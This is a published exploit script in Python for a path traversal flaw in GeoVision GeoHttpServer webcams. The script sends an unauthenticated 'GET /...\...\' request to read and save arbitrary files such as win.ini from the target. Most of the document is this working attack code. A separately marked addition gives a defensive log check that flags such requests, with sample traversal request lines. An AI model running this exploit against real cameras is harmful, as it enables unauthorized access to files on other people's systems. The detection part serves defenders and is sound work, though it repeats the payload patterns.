GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit
Source: minin.viktor@gmail.com Author: Minin Published: 2015-06-11
#!/usr/bin/python
import os
import sys
import socket
import binascii
 
'''
Title       : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID      : none
Product     : GeoVision
System      : GeoHttpServer
Affected    : 8.3.3.0 (may be more)
Impact      : Critical
Remote      : Yes
Website link: http://www.geovision.com.tw/
Reported    : 10/06/2015
Author      : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability.
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download files stored on the server, such as 'boot.ini' and 'win.ini', with a simple URL request that can be made from a browser.
'''
 
#os.system("cls")
os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
os.system('color 2');
 
socket.setdefaulttimeout = 0.50
os.environ['no_proxy'] = '127.0.0.1,localhost'
CRLF = "\r\n"
 
 
def main():
    print "#######################################################################"
    print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
    print "# Usage: <ip> <port> <file>"
    print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini"
    print "#######################################################################"
    exit()
 
try:
    url     = sys.argv[1]
    port    = int(sys.argv[2])
    #files  = open(sys.argv[3],'r').read().split()
    file    = sys.argv[3]
except:
    main()
    
def recvall(sock):
    data = ""
    part = None
    while part != "":
        part = sock.recv(4096)
        data += part
    return data
 
def request(url, port, pfile):
    PATH = str(pfile)  
    HOST = url
    PORT = port
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.connect((HOST, PORT))
    sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
    data = recvall(sock)
    temp = data.split("\r\n\r\n")
    sock.shutdown(1)   
    sock.close()
    return temp[1]
 
ret = request(url, port, file)
hex = "".join("{:02x}".format(ord(c)) for c in ret)
bin = binascii.unhexlify(hex)
print ret
file = open(file.replace('\\', '_'),"wb")
file.write(bin)
file.close()
 
#~EOF
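
Added example (not part of the original exploit and not GeoVision code): a log-side check for the request shape sent above, where the path segments are runs of dots separated by backslashes, so a filter that looks only for "../" does not match. The function names, the decode bound and the sample request lines are constructed for illustration; the request line may arrive without an HTTP version because the script places a CRLF before it.

```python
import re
from urllib.parse import unquote

# A segment made only of dots ("..", "...") is treated as suspicious.
# Assumption: no legitimate camera URL uses such a segment.
DOT_SEGMENT = re.compile(r"\.{2,}")
MAX_DECODE_ROUNDS = 3  # assumption: bound for nested percent-encoding

def normalize_target(target):
    """Drop the query, percent-decode (bounded), unify path separators."""
    path = target.split("?", 1)[0]
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def is_traversal(target):
    """True if any path segment consists solely of two or more dots."""
    segments = normalize_target(target).split("/")
    return any(DOT_SEGMENT.fullmatch(seg) for seg in segments)

def flag_requests(request_lines):
    """Return the request lines whose target contains a dot-run segment."""
    flagged = []
    for line in request_lines:
        parts = line.split(" ")
        if len(parts) >= 2 and is_traversal(parts[1]):
            flagged.append(line)
    return flagged

# Constructed sample request lines (not captured traffic).
SAMPLE = [
    "GET /index.htm HTTP/1.0",
    "GET /...\\...\\windows\\win.ini HTTP/1.0",
    "GET /...\\...\\boot.ini",
    "GET /%2e%2e%2e%5c%2e%2e%2e%5cwindows%5cwin.ini HTTP/1.0",
    "GET /images/logo..png HTTP/1.0",
    "GET /cam/v1.0.1/snapshot.jpg?t=.. HTTP/1.0",
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE):
        print("ALERT", repr(hit))
```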
 